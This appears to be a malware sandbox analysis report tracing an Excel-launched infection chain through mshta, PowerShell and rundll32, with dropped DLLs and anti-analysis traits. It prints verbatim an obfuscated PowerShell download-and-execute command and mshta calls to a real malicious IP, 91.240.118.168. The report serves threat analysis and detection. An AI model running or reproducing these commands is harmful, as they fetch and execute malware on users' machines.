Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........K.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................*D.k....................................}..v.....M......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................*D.k..... ..............................}..v....PN......0.................K.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................E.k....................................}..v.....Z......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................E.k......K.............................}..v.... [......0...............(.K.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................F.k....................................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................F.k....X.K.............................}..v............0.................K.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'................].k....E...............................}..v....p'......0.................K.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+................].k....E...............................}..v.....e......0.................K.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............H.......:.......................

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDB50.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: 3DBB.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\System32\mshta.exe	Code function: 4_3_033A00C0 push 8B4902BAh; iretd
Source: C:\Windows\System32\mshta.exe	Code function: 4_3_033A08C7 push 8B4902BAh; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10032B7D push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10030DFF push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034114C push ds; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003415F5 push cs; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042114C push ds; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004215F5 push cs; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10032B7D push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10030DFF push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047114C push ds; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004715F5 push cs; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026114C push ds; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002615F5 push cs; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033114C push ds; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003315F5 push cs; retf

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

Source: QWER.dll.6.dr

Static PE information: real checksum: 0x8f55d should be: 0x909dc

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\QWER.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\QWER.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Jdywrgg\axwj.zob:Zone.Identifier read attributes \| delete

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100134F0 IsIconic,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100134F0 IsIconic,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\mshta.exe TID: 308

Thread sleep time: -300000s >= -30000s

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.2 %

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: rundll32.exe, 0000000F.00000002.613710689.000000000078A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035D374 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043D374 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048D374 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027D374 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034D374 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
